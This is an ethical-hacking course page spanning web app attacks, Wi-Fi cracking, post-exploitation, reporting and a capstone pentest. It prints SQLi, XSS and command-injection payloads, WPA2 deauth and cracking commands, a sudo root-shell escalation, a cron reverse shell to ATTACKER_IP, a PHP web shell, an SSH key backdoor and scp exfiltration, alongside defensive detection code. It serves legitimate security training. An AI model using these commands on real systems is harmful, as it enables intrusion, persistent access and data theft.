Web Application Security

Advanced ~75 min Requires: Lecture 07

Why Web Apps Are Prime Targets

Web applications are exposed to the internet, process user input, and often connect to databases and internal systems. This makes them a high-value target for attackers.

  • Accessible from anywhere
  • Handle sensitive data (logins, payments)
  • Complex logic → more chances of bugs
🧠 Reality
Most real-world breaches happen through web applications—not networks.

1. OWASP Top 10 (2021)

Rank | Vulnerability | Impact | Example
A01 | Broken Access Control | Unauthorized actions | User accesses admin panel
A02 | Cryptographic Failures | Data leaks | Passwords stored in plaintext
A03 | Injection | Database compromise | SQL Injection login bypass
A04 | Insecure Design | Logical flaws | No rate limiting on login
A05 | Misconfiguration | Exposure | Debug mode enabled
A10 | SSRF | Internal access | Accessing AWS metadata

2. Understanding HTTP (CRITICAL)

You must understand how web apps communicate.

GET /login HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: session=abc123

Key Components

  • Headers → metadata
  • Cookies → session tracking
  • Parameters → user input (attack surface)

3. SQL Injection (Deep Dive)

Occurs when user input is directly used in SQL queries.

' OR '1'='1' --
1 UNION SELECT username,password FROM users --

Attack Flow

  1. Find input field (login/search)
  2. Inject payload
  3. Observe response changes
  4. Extract data

Example

username=admin' OR '1'='1
password=anything

→ Bypasses login authentication
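The following is an added example (not course code) showing why the login bypass above works and why the prepared statements recommended in section 10 stop it: the same payloads (this section's tautology and the comment-style payload from the list above, which also underlies the blind variant in Lecture 07 §5.4) are run against a string-built query and a parameterised one. The user table is a constructed in-memory SQLite database.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's user table.
    Plaintext passwords keep the demo short; real systems store password hashes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("admin", "S3cret!", "admin"), ("alice", "hunter2", "user")])
    return db


def login_vulnerable(db, username, password):
    """String-built query: the input becomes part of the SQL grammar, so a
    quote in the username closes the literal and the rest is parsed as SQL."""
    query = ("SELECT username, role FROM users "
             "WHERE username = '%s' AND password = '%s'" % (username, password))
    return db.execute(query).fetchone()


def login_safe(db, username, password):
    """Prepared statement: the driver binds the values as data, so the query
    structure is fixed before any user input is seen."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone()


def demo():
    """Run the lecture's payloads against both implementations.
    Returns {case: (row returned by vulnerable login, row returned by safe login)}."""
    db = make_db()
    cases = {
        "tautology": ("admin' OR '1'='1", "anything"),   # payload from this section
        "comment":   ("' OR '1'='1' --", "x"),           # payload from the list above
        "legit":     ("admin", "S3cret!"),               # a real login must still work
    }
    return {name: (login_vulnerable(db, u, p), login_safe(db, u, p))
            for name, (u, p) in cases.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print("%-10s vulnerable=%s  safe=%s" % (name, vuln, safe))
```

With the tautology payload the vulnerable query becomes `... WHERE username = 'admin' OR '1'='1' AND password = 'anything'`, which returns the admin row; the parameterised query compares the whole string as a username and returns nothing.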

Automated Testing

sqlmap -u "http://target.com/login.php?id=1" --dbs

4. Cross-Site Scripting (XSS)

Injecting JavaScript into a web page.

<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>

Types

  • Stored → Saved on server
  • Reflected → Immediate response
  • DOM-based → Client-side only

Impact

  • Session hijacking
  • Credential theft
  • Defacing websites

5. Command Injection

Occurs when user input is passed to system commands.

; ls -la
| whoami
&& cat /etc/passwd

Example

If input is:

ping 127.0.0.1; whoami

→ Executes extra command on server
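As an added example (not from the course), the code below shows what a shell does with the page's ping input and the hardened alternative: it tokenises the spliced command line the way a POSIX shell would, so you can see the injected second command, and then builds the safe argv form that validates the host against an allow-list and never involves a shell. Function names and the allow-list regex are this example's own.

```python
import re
import shlex
import subprocess

# Hostname / IPv4 allow-list (RFC 1123 labels joined by dots). A leading '-'
# is rejected so the value can never be read as an option either.
HOST_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def vulnerable_ping_command(user_input):
    """What the vulnerable application does: splice raw input into one string
    that is then handed to /bin/sh (system(), shell=True, backticks, ...)."""
    return "ping -c 1 " + user_input


def shell_commands(command_line):
    """Tokenise a command line as a POSIX shell would and split it at the
    separators ; && || |. Returns one argv list per command the shell would run."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for token in lexer:
        if token in (";", "&&", "||", "|"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def safe_ping_argv(user_input):
    """Validate against the allow-list and pass the value as one argv element.
    No shell is involved, so separators and quotes carry no meaning."""
    if len(user_input) > 253 or not HOST_RE.match(user_input):
        raise ValueError("invalid host: %r" % user_input)
    return ["ping", "-c", "1", "--", user_input]


def run_ping(user_input):
    """Execute the hardened form (shell=False) and return the exit status."""
    return subprocess.run(safe_ping_argv(user_input), capture_output=True).returncode


if __name__ == "__main__":
    for payload in ("127.0.0.1; whoami", "x | whoami", "y && cat /etc/passwd"):
        print("%-22s -> %s" % (payload, shell_commands(vulnerable_ping_command(payload))))
    print(safe_ping_argv("127.0.0.1"))
```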

6. Authentication & Session Attacks

  • Weak passwords
  • No rate limiting (brute force)
  • Session fixation
  • Session hijacking

Set-Cookie: session=abc123

If stolen → attacker becomes user.

7. Directory & Endpoint Discovery

gobuster dir -u http://target.com -w wordlist.txt
ffuf -u http://target.com/FUZZ -w wordlist.txt

Find hidden:

  • /admin
  • /backup
  • /api

8. API Security Testing

Modern apps rely heavily on APIs.

GET /api/users/1
Authorization: Bearer token

Common Issues

  • IDOR (Insecure Direct Object Reference)
  • Missing authentication
  • Rate limiting issues

9. Testing Tools (Professional Stack)

  • Burp Suite — Intercept & modify requests
  • OWASP ZAP — Automated scanning
  • SQLMap — SQL injection
  • FFUF — Fast fuzzing
  • Postman — API testing

10. Secure Development Practices

  • Input validation & sanitization
  • Use prepared statements
  • Implement authentication controls
  • Use HTTPS everywhere
  • Apply Content Security Policy (CSP)
🔥 Advanced Tip
The most critical bugs are often business logic flaws—not simple injections.
🎯 Exercise 8.1 — Practical Testing

On DVWA / Juice Shop:
1. Intercept requests with Burp Suite
2. Test login for SQLi
3. Inject XSS payload
4. Discover hidden directories

🎯 Exercise 8.2 — Analysis

Choose one vulnerability and explain:
• How it works
• How to exploit it
• How to fix it

🔥 Challenge

Perform a full web app test and create a report:
• Vulnerabilities found
• Exploitation steps
• Impact
• Fixes

Lecture 09 · Advanced

Wireless & Mobile Hacking (Practical Lab)

Advanced ~75 min Requires: Lecture 08

⚠️ Lab Setup (IMPORTANT)

This is a hands-on module. You MUST use:

  • Your own Wi-Fi network OR lab environment
  • Kali Linux (or similar)
  • USB Wi-Fi adapter that supports monitor mode
⚠️ Legal Warning
Only test networks you own or have permission to test.

1. Wi-Fi Hacking Fundamentals (Practical Understanding)

What You Are Actually Attacking

In Wi-Fi attacks, you are NOT directly "hacking the router". You are attacking:

  • Authentication process (handshake)
  • Weak passwords
  • Misconfigured features (WPS)
🧠 Key Insight
WPA2 is not “broken” — weak passwords are.

2. Lab 1 — Monitor Mode & Network Discovery

Step 1: Enable Monitor Mode

airmon-ng check kill
airmon-ng start wlan0

Result: wlan0 → wlan0mon

Step 2: Scan Networks

airodump-ng wlan0mon

What to Look For

  • BSSID → Router MAC
  • Channel → Important for targeting
  • ENC → WPA2 / WPA3
  • Clients → Connected devices

Example Output

BSSID              CH  ENC   ESSID
AA:BB:CC:DD:EE:FF  6   WPA2  MyWiFi

3. Lab 2 — Capturing WPA2 Handshake

Step 1: Lock onto Target

airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Step 2: Force Reconnection (Deauth)

aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

This forces devices to reconnect → handshake is captured.

Success Indicator

"WPA handshake: AA:BB:CC..."

💡 Tip
No clients = no handshake. You need at least one connected device.

4. Lab 3 — Cracking WPA2 Password

aircrack-ng capture.cap -w rockyou.txt

What Happens

  • Tool compares handshake against wordlist
  • If password is weak → cracked
  • If strong → attack fails

Example Result

KEY FOUND! [ password123 ]

5. Lab 4 — WPS Attack (Fast Method)

reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

WPS uses a PIN → easier to brute-force than passwords.

⚠️ Reality
Many modern routers disable WPS due to this vulnerability.

6. Evil Twin Attack (Concept + Practical)

Create a fake Wi-Fi with same name → trick users.

wifiphisher

Attack Flow

  1. Create fake AP
  2. Disconnect real users
  3. Victim connects to fake AP
  4. Capture credentials
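On the defensive side of this attack flow, a network owner can spot a fake AP because it advertises a known ESSID from a BSSID the owner does not operate, usually with weaker encryption. The script below is an added example (not part of the lab) that parses a scan listing in the simplified BSSID / CH / ENC / ESSID layout shown in Lab 1 and flags those indicators; the scan lines and the known-AP list are constructed.

```python
import re

# Scan listing in the simplified layout shown in Lab 1 above (constructed)
SAMPLE_SCAN = """\
BSSID              CH  ENC   ESSID
AA:BB:CC:DD:EE:FF  6   WPA2  MyWiFi
AA:BB:CC:DD:EE:F0  11  OPN   MyWiFi
11:22:33:44:55:66  1   WPA2  Neighbour
AA:BB:CC:DD:EE:FF  6   WPA2  MyWiFi
"""

# The access points the network owner actually operates (constructed)
KNOWN_APS = {"MyWiFi": {"AA:BB:CC:DD:EE:FF"}}

ROW = re.compile(r"^([0-9A-F]{2}(?::[0-9A-F]{2}){5})\s+(\d+)\s+(\S+)\s+(.+?)\s*$", re.I)
ENC_RANK = {"OPN": 0, "WEP": 1, "WPA": 2, "WPA2": 3, "WPA3": 4}


def parse_scan(text):
    """Map BSSID -> {channel, enc, essid}; header, blank and repeated lines collapse."""
    aps = {}
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            bssid, ch, enc, essid = m.groups()
            aps[bssid.upper()] = {"channel": int(ch), "enc": enc.upper(), "essid": essid}
    return aps


def find_evil_twins(aps, known=KNOWN_APS):
    """Flag any BSSID that advertises one of our ESSIDs but is not one of our
    APs, and note when it offers weaker encryption than the real AP (the
    classic 'open network with the same name' lure)."""
    alerts = []
    for bssid, ap in aps.items():
        trusted = known.get(ap["essid"])
        if trusted is None or bssid in trusted:
            continue  # not our network, or one of our own APs
        reasons = ["unknown BSSID advertising our ESSID"]
        real_enc = [ENC_RANK.get(aps[t]["enc"], 0) for t in trusted if t in aps]
        if real_enc and ENC_RANK.get(ap["enc"], 0) < min(real_enc):
            reasons.append("weaker encryption than our AP (%s)" % ap["enc"])
        alerts.append({"essid": ap["essid"], "bssid": bssid,
                       "channel": ap["channel"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in find_evil_twins(parse_scan(SAMPLE_SCAN)):
        print("%(essid)s on %(bssid)s (ch %(channel)d): %(reasons)s" % alert)
```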

7. Mobile Hacking (Practical Basics)

Android APK Analysis

apktool d app.apk
jadx-gui app.apk

What to Look For

  • Hardcoded passwords
  • API keys
  • Hidden endpoints

Dynamic Testing (Runtime)

adb devices
adb shell
frida -U -n app

Allows you to inspect and manipulate app behavior live.

8. Bluetooth Attacks (Practical Awareness)

hcitool scan
bluetoothctl

Example

  • Discover nearby devices
  • Attempt pairing attacks

9. Common Mistakes Beginners Make

  • No monitor mode support → nothing works
  • Trying WPA3 → usually not crackable
  • No clients → no handshake
  • Weak wordlists → no success
🎯 Reality Check
90% of success depends on:
• Weak passwords
• Misconfigurations
• User mistakes

10. Defense (VERY IMPORTANT)

  • Use WPA3 or strong WPA2 passwords
  • Disable WPS
  • Use hidden SSID (basic protection)
  • Enable MAC filtering (limited security)
  • Monitor connected devices
🎯 Lab Exercise 9.1 — Full Attack Chain

In your lab:
1. Enable monitor mode
2. Scan networks
3. Capture handshake
4. Attempt password cracking
5. Document results

🎯 Lab Exercise 9.2 — Mobile Analysis

Download a test APK:
• Decompile it
• Find sensitive data
• Write findings

🔥 Challenge

Simulate a real penetration test:
• Wi-Fi recon
• Capture handshake
• Attempt crack
• Analyze mobile app
• Write full report

Lecture 10 · Advanced

Post-Exploitation & Persistence (Practical Lab)

Advanced ~70 min Requires: Lecture 09

⚠️ Lab Context

You already have access (shell or Meterpreter). Now your job is to:

  • Understand the system
  • Escalate privileges
  • Maintain access
  • Extract value
🧠 Operator Mindset
Don’t rush. First understand the system → then act.

1. Phase 1 — Situational Awareness (Enumeration)

This is ALWAYS your first step after access.

# Basic identity
whoami
id

# System info
uname -a
hostname

# Network
ip addr
netstat -tuln

# Processes
ps aux

# Users
cat /etc/passwd

What You Are Looking For

  • Are you root/admin?
  • What OS + version?
  • What services are running?
  • Other users on system?

Example Insight

uid=1000(user) gid=1000(user)

→ You are NOT root → privilege escalation needed

2. Phase 2 — Privilege Escalation (Hands-On)

Quick Automated Check

linpeas.sh

Manual Checks (IMPORTANT)

Sudo Permissions

sudo -l

Example

(ALL) NOPASSWD: /usr/bin/python

→ You can escalate:

sudo python -c 'import os; os.system("/bin/bash")'

SUID Files

find / -perm -4000 2>/dev/null

Look for unusual binaries.

Kernel Exploit Check

uname -r

Search for exploit matching kernel version.

💡 Real Skill
Privilege escalation is about misconfigurations—not magic exploits.

3. Phase 3 — Credential Hunting

# Search for passwords
grep -r "password" /home 2>/dev/null

# Check bash history
cat ~/.bash_history

# Config files
cat /var/www/html/config.php

Example

$db_password = "admin123";

→ Try reuse for SSH or other services

4. Phase 4 — Persistence (Maintain Access)

Method 1: Cron Job (Linux)

crontab -e
*/5 * * * * bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

Method 2: SSH Backdoor

mkdir -p ~/.ssh
echo "ATTACKER_PUBLIC_KEY" >> ~/.ssh/authorized_keys

Method 3: Web Shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php

Access via browser:

http://target/shell.php?cmd=whoami

Windows Persistence

schtasks /create /tn "Updater" /tr "evil.exe" /sc minute /mo 5

5. Phase 5 — Lateral Movement

Move to other machines using stolen credentials.

ssh user@192.168.1.20

Pivoting Example

ssh -D 9050 user@target

→ Use target as proxy to access internal network

6. Phase 6 — Data Collection (NOT DESTRUCTIVE)

ls /home
cat /etc/shadow
tar -czf data.tar.gz /var/www

Exfiltration (Lab Only)

scp data.tar.gz user@attacker_ip:/tmp/
⚠️ Critical Rule
Never exfiltrate real sensitive data in real environments.

7. Full Attack Chain Example

  1. Gain shell (web exploit)
  2. Run enumeration (whoami, uname)
  3. Find sudo misconfig
  4. Escalate to root
  5. Dump credentials
  6. Add SSH key (persistence)
  7. Move to another machine
🎯 Reality
Real hacking is chaining small weaknesses—not one big exploit.

8. Detection & Defense (VERY IMPORTANT)

  • Monitor user crontabs and /etc/cron.d for new or changed entries
  • Check every ~/.ssh/authorized_keys against the keys you actually issued
  • Audit running processes and their outbound connections
  • Use EDR (Endpoint Detection and Response)
  • Apply least privilege: no NOPASSWD sudo rules for interpreters, minimal SUID binaries
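The first two checklist items can be automated against the persistence methods shown in Phase 4. The script below is an added example, not part of the course material: it flags crontab lines carrying reverse-shell indicators and authorized_keys entries whose fingerprint is not on an allowlist. The indicator list is an assumption to tune per environment, and the keys and crontab in the sample are constructed (the key blobs are arbitrary bytes, not real keys).

```python
"""Persistence hunting for the detection checklist above.

Added example, not part of the course material: it applies the checklist to
the Linux persistence methods from Phase 4 (cron reverse shells and planted
SSH keys). In practice you feed it `crontab -l -u <user>`, the files under
/etc/cron.d, and each user's ~/.ssh/authorized_keys; the samples below are
constructed.
"""
import base64
import hashlib
import re

# Substrings that almost never appear in legitimate cron jobs (assumption:
# tune to your environment; a match is a lead, not a verdict).
CRON_INDICATORS = {
    "/dev/tcp/": "bash network redirection (reverse shell)",
    "bash -i": "interactive shell launched non-interactively",
    "nc -e": "netcat executing a program",
    "base64 -d": "decoding an embedded payload",
    "| sh": "piping downloaded content into a shell",
    "| bash": "piping downloaded content into a shell",
}


def suspicious_cron_entries(crontab_text):
    """Return (line, [reasons]) for crontab lines that match an indicator."""
    findings = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        reasons = [why for needle, why in CRON_INDICATORS.items() if needle in stripped]
        if reasons:
            findings.append((stripped, reasons))
    return findings


KEY_TYPE = re.compile(r"^(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-\S+|sk-\S+)$")


def ssh_fingerprint(key_line):
    """SHA256 fingerprint of one authorized_keys entry, in the form ssh-keygen -lf prints."""
    tokens = key_line.split()
    # Skip leading options such as command="..." or from="..." by locating the key type.
    for i, tok in enumerate(tokens):
        if KEY_TYPE.match(tok) and i + 1 < len(tokens):
            blob = base64.b64decode(tokens[i + 1])
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    raise ValueError(f"not an authorized_keys entry: {key_line!r}")


def unknown_ssh_keys(authorized_keys_text, allowed_fingerprints):
    """Entries whose fingerprint is not allowlisted; the comment field is never trusted."""
    unknown = []
    for line in authorized_keys_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fp = ssh_fingerprint(line)
        if fp not in allowed_fingerprints:
            unknown.append((fp, line.strip()))
    return unknown


# Constructed sample data. The base64 "blobs" are arbitrary bytes, not real keys;
# the planted key copies the admin's comment, which is why comments are ignored.
ADMIN_KEY = "ssh-ed25519 " + base64.b64encode(b"constructed admin key blob").decode() + " admin@workstation"
PLANTED_KEY = "ssh-ed25519 " + base64.b64encode(b"constructed attacker key blob").decode() + " admin@workstation"
SAMPLE_AUTHORIZED_KEYS = ADMIN_KEY + "\n" + PLANTED_KEY + "\n"
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'
"""

if __name__ == "__main__":
    for line, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"[cron] {line}\n       {'; '.join(reasons)}")
    allowed = {ssh_fingerprint(ADMIN_KEY)}  # built from the keys you issued
    for fp, line in unknown_ssh_keys(SAMPLE_AUTHORIZED_KEYS, allowed):
        print(f"[ssh] unknown key {fp}: {line}")
```

The allowlist should be built from your key inventory, not from the file on the host, otherwise a planted key becomes "known" the first time the script runs.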

9. Common Beginner Mistakes

  • Skipping enumeration → missing easy escalation
  • Using exploits blindly
  • Not documenting steps
  • Breaking the system (too aggressive)
🎯 Lab 10.1 — Full Post-Exploitation

On a lab machine:
1. Gain shell
2. Enumerate system
3. Escalate privileges
4. Add persistence (SSH or cron)
5. Collect non-sensitive data

🎯 Lab 10.2 — Analysis

Document:
• How you escalated privileges
• What vulnerability allowed it
• How to fix it

🔥 Challenge

Simulate a real pentest:
• Initial access
• Privilege escalation
• Persistence
• Lateral movement
• Report everything

Lecture 11 · Advanced

Reporting & Legal Aspects (Practical Lab)

Advanced ~65 min Requires: Lecture 10

🎯 Objective (What You Will Produce)

By the end of this lab, you will create a **real penetration testing report** from your previous exercises (scanning, exploitation, post-exploitation).

🧠 Reality
Clients don’t pay for hacks — they pay for clear, actionable reports.

1. Step-by-Step Reporting Workflow

  1. Collect evidence (screenshots, logs, commands)
  2. Verify vulnerability (avoid false positives)
  3. Assess impact (what can attacker do?)
  4. Assign severity (Critical/High/Medium/Low)
  5. Write clear reproduction steps
  6. Provide remediation

2. Evidence Collection (VERY PRACTICAL)

What to Capture

  • Terminal output
  • Screenshots of exploitation
  • Tool results (Nmap, Burp, etc.)
# Save scan output
nmap -sV target.com -oN scan.txt

# Save command history
history > commands.txt
💡 Tip
Every finding must be reproducible from your evidence.

3. Writing a Real Vulnerability (Hands-On)

Example: SQL Injection Finding

Vulnerability: SQL Injection
Severity: Critical

Affected URL:
http://target.com/login.php?id=1

Description:
The application builds its SQL query by concatenating user input, so the query logic can be altered.

Proof of Concept:
Input:
' OR '1'='1' -- 

Result:
Login bypass successful (authenticated without valid credentials; note the space after --, which MySQL requires to treat it as a comment)

Impact:
• Unauthorized access
• Database compromise

Recommendation:
• Use prepared statements (parameterized queries) for every query that takes user input
• Validate user input against an allowlist as a second layer, not as the only fix

What Makes This Good

  • Clear location
  • Exact payload used
  • Shows impact
  • Fix is actionable

4. Report Template (Use This in Labs)

===============================
PENETRATION TEST REPORT
===============================

Target: [Lab Machine / Domain]
Date: [Insert Date]

1. Executive Summary
- Overall Risk: HIGH
- Key Issues: Weak passwords, outdated services

2. Methodology
- Recon → Scanning → Exploitation → Post-Exploitation

3. Findings

[Finding 1]
Name:
Severity:
Description:
Proof of Concept:
Impact:
Recommendation:

[Finding 2]
...

4. Conclusion
- System is vulnerable due to misconfigurations

5. Remediation Plan
- Fix critical issues immediately

5. Severity Rating (Practical Method)

Instead of memorizing CVSS, ask:

  • Can attacker get admin/root? → Critical
  • Can attacker access sensitive data? → High
  • Limited access? → Medium
  • Minor issue? → Low

Example

Open port 80 serving the intended site → Low (informational on its own, not a vulnerability)
Directory listing enabled → Medium
SQL injection with login bypass → Critical
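The report template in section 4 and the severity method in section 5 fit together: if findings are kept as data, the executive summary's overall risk can be derived from the worst finding instead of typed by hand, and the template comes out identical every time. The script below is an added example, not part of the course material; the sample findings are constructed from this course's earlier labs, the fix windows are an assumption, and the target name and date are placeholders.

```python
"""Report assembly for the template (section 4) and severity method (section 5).

Added example, not part of the course material: findings are data, overall
risk is the worst severity present, and the template text is generated so
every lab report has the same shape. Sample findings are constructed.
"""
from dataclasses import dataclass

SEVERITY_ORDER = ["Critical", "High", "Medium", "Low"]  # worst first

# How soon each severity must be fixed (assumption: typical engagement terms;
# use the client's own SLA when they have one).
FIX_WINDOW = {"Critical": "immediately", "High": "within 7 days",
              "Medium": "within 30 days", "Low": "next maintenance window"}


@dataclass
class Finding:
    name: str
    severity: str
    location: str
    description: str
    proof_of_concept: str
    impact: list
    recommendation: list

    def __post_init__(self):
        if self.severity not in SEVERITY_ORDER:
            raise ValueError(f"unknown severity {self.severity!r} for {self.name}")


def sort_findings(findings):
    """Worst first, then by name, so the reader meets critical issues first."""
    return sorted(findings, key=lambda f: (SEVERITY_ORDER.index(f.severity), f.name))


def overall_risk(findings):
    """Label for the executive summary: the single worst severity present."""
    if not findings:
        return "NONE"
    return sort_findings(findings)[0].severity.upper()


def render_finding(number, f):
    lines = [f"[Finding {number}]", f"Name: {f.name}", f"Severity: {f.severity}",
             f"Location: {f.location}", f"Description: {f.description}",
             "Proof of Concept:", f"  {f.proof_of_concept}", "Impact:"]
    lines += [f"  - {item}" for item in f.impact]
    lines.append("Recommendation:")
    lines += [f"  - {item}" for item in f.recommendation]
    return "\n".join(lines)


def render_report(target, date, findings):
    ordered = sort_findings(findings)
    key_issues = ", ".join(f.name for f in ordered[:3]) or "none"
    out = ["===============================", "PENETRATION TEST REPORT",
           "===============================", f"Target: {target}", f"Date: {date}", "",
           "1. Executive Summary", f"- Overall Risk: {overall_risk(ordered)}",
           f"- Key Issues: {key_issues}", "",
           "2. Methodology", "- Recon → Scanning → Exploitation → Post-Exploitation", "",
           "3. Findings", ""]
    for i, f in enumerate(ordered, 1):
        out += [render_finding(i, f), ""]
    out += ["4. Conclusion",
            f"- {len(ordered)} finding(s); worst severity {overall_risk(ordered)}", "",
            "5. Remediation Plan"]
    out += [f"- {f.name}: {FIX_WINDOW[f.severity]}" for f in ordered]
    return "\n".join(out) + "\n"


# Constructed findings drawn from this course's own lab examples.
SAMPLE_FINDINGS = [
    Finding("Directory listing enabled", "Medium", "web root",
            "The web server lists directory contents, exposing file names.",
            "Requesting a directory without an index file returns a listing",
            ["Discloses internal file names and structure"],
            ["Disable directory indexing in the web server configuration"]),
    Finding("SQL injection in login form", "Critical", "http://target.com/login.php?id=1",
            "User input is concatenated into the SQL query.",
            "' OR '1'='1' --  (authentication bypassed)",
            ["Unauthorized access", "Database compromise"],
            ["Use prepared statements", "Validate user input"]),
    Finding("Hard-coded database password", "High", "/var/www/html/config.php",
            "A readable config file in the web root contains the database password.",
            "cat /var/www/html/config.php shows $db_password = \"admin123\";",
            ["Credential reuse against SSH and the database"],
            ["Move secrets out of the web root", "Rotate the password"]),
    Finding("sudo NOPASSWD rule for python", "Critical", "/etc/sudoers",
            "www-data may run /usr/bin/python as root without a password.",
            "sudo /usr/bin/python -c 'import os; os.system(\"/bin/bash\")' gives a root shell",
            ["Full root compromise from the web shell"],
            ["Remove the rule; never grant sudo to interpreters"]),
]

if __name__ == "__main__":
    print(render_report("Lab Machine", "[Insert Date]", SAMPLE_FINDINGS))
```

Run it as a script to print the filled template; for Lab 11.1 replace SAMPLE_FINDINGS with your own finding and keep the PoC text to exactly what you ran.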

6. Legal Aspects (Practical Understanding)

Before Testing (Mandatory)

  • Written permission
  • Defined scope (IPs, domains)
  • Time window

Example Scope

Allowed:
192.168.1.0/24

Not Allowed:
Production servers
Third-party services

During Testing

  • No data destruction
  • No service disruption
  • Stay within scope

After Testing

  • Delete collected sensitive data
  • Submit report securely
⚠️ Critical Rule
Testing without permission = illegal hacking.

7. Common Reporting Mistakes

  • Too technical for management
  • No proof of concept
  • No remediation steps
  • Copy-paste from tools without explanation

8. Lab Exercise — Build Your First Report

🎯 Lab 11.1 — Full Report

Using your previous labs:
1. Pick ONE vulnerability
2. Write full finding (PoC, impact, fix)
3. Add screenshots/logs
4. Assign severity

🎯 Lab 11.2 — Mini Engagement

Simulate a real pentest:
• Scan target
• Find vulnerability
• Exploit (lab only)
• Write full report

🔥 Challenge

Create a professional PDF report:
• Cover page
• Executive summary
• 3+ findings
• Remediation plan

Lecture 12 · Capstone

Capstone Project: Full Penetration Test

Advanced ~120 min + ongoing Requires: All Previous Lectures

Project Overview

Congratulations! You have reached the final lecture. Now you will perform a **complete, realistic penetration test** on a vulnerable target, following professional methodology.

Target Environment

Use one of these legal lab environments:

  • Metasploitable 2 / 3
  • TryHackMe / HackTheBox machines (recommended)
  • DVWA + VulnHub VMs
  • Your own isolated virtual lab

Capstone Requirements

Phase 1: Reconnaissance & Footprinting

  • Passive information gathering (WHOIS, Google Dorks, Shodan)
  • Active host & service discovery

Phase 2: Scanning & Enumeration

  • Full port scanning with Nmap
  • Service version detection
  • Web directory brute-forcing
  • SMB / SNMP enumeration (if applicable)

Phase 3: Vulnerability Analysis & Exploitation

  • Identify at least 3 exploitable vulnerabilities
  • Gain initial shell access (Meterpreter or reverse shell)
  • Perform privilege escalation

Phase 4: Post-Exploitation & Persistence

  • Establish persistence
  • Extract sensitive data / credentials
  • Demonstrate lateral movement (if multiple machines)

Phase 5: Reporting

  • Write a full professional penetration testing report
  • Include Executive Summary, Methodology, Findings with PoC, Risk Ratings, and Remediation Recommendations
🚀 Success Criteria

You should be able to:

  • Compromise at least one machine with root/admin access
  • Document everything clearly
  • Provide actionable remediation steps

Bonus Challenges (Optional)

  • Crack captured password hashes
  • Perform a client-side attack (phishing simulation)
  • Exploit a web application vulnerability manually
  • Create a custom payload / bypass antivirus
🎯 Final Capstone Deliverable

Submit a complete penetration testing report (PDF) including all phases above. This report should be written as if you are presenting it to a real client.

🎉 Congratulations!

You have completed the full Ethical Hacking Mastery course. You now possess the foundational and practical skills required to begin your journey as an ethical hacker / penetration tester.

Next Steps: Practice on HackTheBox, TryHackMe, or CTF platforms. Consider certifications like CEH, eJPT, or OSCP.

Lecture 13 · Advanced

Social Engineering

Intermediate ~50 min Requires: Lecture 12

Content coming soon...

Lecture 14 · Advanced

Cryptography Basics

Advanced ~55 min Requires: Lecture 13

Content coming soon...

Lecture 15 · Advanced

Cloud Security (AWS/Azure)

Advanced ~50 min Requires: Lecture 14

Content coming soon...

Lecture 16 · Professional

Final Project — Full Penetration Test

Advanced ~90 min Requires: All Previous

Content coming soon...